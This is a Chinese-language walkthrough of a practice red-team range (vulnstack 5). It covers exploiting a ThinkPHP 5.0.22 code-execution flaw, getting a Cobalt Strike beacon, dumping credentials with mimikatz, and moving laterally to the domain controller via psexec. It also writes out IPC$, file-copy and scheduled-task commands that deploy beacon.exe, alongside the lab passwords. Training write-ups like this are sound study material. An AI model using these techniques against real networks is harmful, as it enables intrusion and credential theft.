渗透靶场--vulnstack-红队评估实战(5)

vulnstack-红队评估实战(5)

环境配置

win7
sun\heart 123.com    sun\Administrator dc123.com
内网:192.168.138.136 外网:192.168.154.140
启动phpstudy

2008
sun\admin 2021.com
192.168.138.138

kali
192.168.154.129

1.对外网主机进行信息搜集

渗透靶场--vulnstack-红队评估实战(5)_第1张图片

开放了80和3306,先访问80为thinkphp,通过错误页面得到版本信息5.0.22

渗透靶场--vulnstack-红队评估实战(5)_第2张图片

搜索知道有一个代码执行漏洞,vulmap跑

渗透靶场--vulnstack-红队评估实战(5)_第3张图片

获得shell

渗透靶场--vulnstack-红队评估实战(5)_第4张图片

渗透靶场--vulnstack-红队评估实战(5)_第5张图片

2.内网信息搜集

权限为administrator

image-20210720094050372

生成exe上传执行,上线CS

渗透靶场--vulnstack-红队评估实战(5)_第6张图片

执行mimikatz得到

渗透靶场--vulnstack-红队评估实战(5)_第7张图片image-20210720095303458

由于administrator不能查询域信息,利用跑出来的面膜spawn as 出一个leo用户shell

渗透靶场--vulnstack-红队评估实战(5)_第8张图片

域管理员为Administrator ,域控机器名为DC

渗透靶场--vulnstack-红队评估实战(5)_第9张图片

渗透靶场--vulnstack-红队评估实战(5)_第10张图片

ping DC.sun.com得到域控IP

渗透靶场--vulnstack-红队评估实战(5)_第11张图片

3.横向移动

net view错误,那就通过port scan扫描到138使其加入到targets中

image-20210720102027156

又因为DC不出网,所以再win7上建立监听

渗透靶场--vulnstack-红队评估实战(5)_第12张图片

建立监听后直接通过利用之前跑出的administrator用户和psexec来控制DC

渗透靶场--vulnstack-红队评估实战(5)_第13张图片

但是这里跑不出来,后来发现是WIN7建立监听但是防火墙没有关闭,导致DC无法与端口进行传输

所以关闭防火墙

渗透靶场--vulnstack-红队评估实战(5)_第14张图片

DC上线!

渗透靶场--vulnstack-红队评估实战(5)_第15张图片

DC用户的密码

渗透靶场--vulnstack-红队评估实战(5)_第16张图片

这里横向也可以利用IPC(当密码过期时,psexec会失败)

建立IPC连接

net use \\192.168.138.138\ipc$ "dc123.com" /user:administrator

检查

net use

上传文件(这里的exe要是完整的,监听为Win7的)

copy C:\\beacon.exe \\192.168.138.138\c$

查看时间,设置计划任务(间隔时间不要太短)

net time \\192.168.138.138
at \\192.168.138.138 yy:xx:mm c:\beacon.exe

你可能感兴趣的:(渗透靶场,渗透测试)